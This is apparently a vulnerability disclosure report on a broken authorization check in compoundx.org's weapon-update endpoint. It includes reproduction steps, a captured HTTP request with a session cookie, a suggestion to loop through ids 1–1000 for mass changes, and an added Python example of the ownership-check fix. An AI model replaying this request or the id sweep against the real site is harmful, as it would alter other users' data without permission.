Impact:
Any user with a valid session cookie can rewrite the data fields of any enemy weapon in the database, regardless of ownership or privacy settings.
Steps to Reproduce:
Fill in the required fields, then capture the packet generated by clicking the "Submit to DB" button (shown below).
Change the enemy weapon id (§§ in the example packet) to an arbitrary number, or a particular one if you happen to have a particular enemy weapon in mind and know its id.
Make arbitrary changes to data fields, such as name, description, privacy, etc., then submit the packet.
Use automation software to submit packets cycling through monster ids from 1 to 1000 (or however high one prefers) to effect mass changes to all enemy weapons.
Using the below packet, I was able to rewrite any monster in the database by altering the §§ in the first line to reference any enemy weapon id. Then, in the data fields, information can be arbitrarily changed to effect whatever alteration an agent wishes to make, including alteration of privacy settings.

POST /updateMonsterWeapon/§§ HTTP/1.1
Host: www.compoundx.org
Connection: close
Content-Length: 239
Cache-Control: max-age=0
Origin: https://www.compoundx.org
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Referer: https://www.compoundx.org/monsterweaponupdate/1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=.eJyrVorQdQ4OclOyqlZSSFKyUorKtTRJ8fAqS3G0tVWq1VFKySwuyEmszEvMTYWrCc51K4mK8AXLF-XnICRC3SsyUsPDKkESpcWpRSi6wjzCKlPcK3KS3C0ro8Cm1wIAWVwmqQ.ESuFpg.jwrHczi4OYXLM62Xtm9QGSaF_yE

name=Flying+Turtle&damage=0&refmod=0&ap_level=0&reload_dc=0&move_speed_penalty=0&cost=7000&mag=1&magCost=0&auto_fire_rate=60&type=Bow&range1=0&accuracy1=0&range2=0&accuracy2=0&range3=0&accuracy3=0&fire_select=None&description=Run.+In+fear.

Recommended fix:
Adding in permissions that disallow (non-admin) users from updating enemy weapons that they did not make would prevent a bad actor with a single (non-admin) cookie from updating enemy weapons owned by other users.
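An added example (not code from the compoundx.org application) of the recommended fix: the update handler as reported, beside the same handler with an ownership/admin check in front of the write. The in-memory data store, the User and MonsterWeapon models, the sample rows and the sweep helper are constructed assumptions; only the updatable field names follow the captured form body.

```python
# Added example (not compoundx.org's own code): the ownership/admin check the report
# recommends, as a framework-agnostic handler. Models and sample rows are constructed
# assumptions; the updatable field names follow the captured form body.
from dataclasses import dataclass, field
@dataclass
class User:
    id: int
    is_admin: bool = False
@dataclass
class MonsterWeapon:
    id: int
    owner_id: int
    fields: dict = field(default_factory=dict)
# Only these form keys may be written; id and owner_id never come from the client.
UPDATABLE_FIELDS = {"name", "damage", "cost", "type", "description", "privacy"}

class Forbidden(Exception):
    """Caller may not update this weapon (a web handler would answer 403)."""

def update_weapon_vulnerable(db, user, weapon_id, form):
    """Mirrors the reported behaviour: any logged-in user may update any id."""
    weapon = db[weapon_id]
    weapon.fields.update({k: v for k, v in form.items() if k in UPDATABLE_FIELDS})
    return weapon

def update_weapon_fixed(db, user, weapon_id, form):
    """Same write, but only after the recommended ownership/admin check."""
    weapon = db.get(weapon_id)
    if weapon is None:
        raise KeyError(weapon_id)  # 404 in a web handler
    if not (user.is_admin or weapon.owner_id == user.id):
        raise Forbidden(f"user {user.id} does not own weapon {weapon_id}")
    weapon.fields.update({k: v for k, v in form.items() if k in UPDATABLE_FIELDS})
    return weapon

def sweep_ids(db, user, form, max_id, handler):
    """Regression check: ids this user ends up changing over ids 1..max_id."""
    changed = []
    for weapon_id in range(1, max_id + 1):
        try:
            handler(db, user, weapon_id, form)
            changed.append(weapon_id)
        except (KeyError, Forbidden):
            continue
    return changed

def make_db():  # constructed sample rows: user 10 owns weapon 1, user 11 owns 2 and 3
    return {1: MonsterWeapon(1, 10, {"name": "Longbow"}),
            2: MonsterWeapon(2, 11, {"name": "Sling"}), 3: MonsterWeapon(3, 11, {"name": "Dagger"})}
```

With the vulnerable handler, sweeping ids as user 10 rewrites every row; with the fixed handler the same sweep only touches weapon 1, and an owner_id value smuggled in the form is ignored.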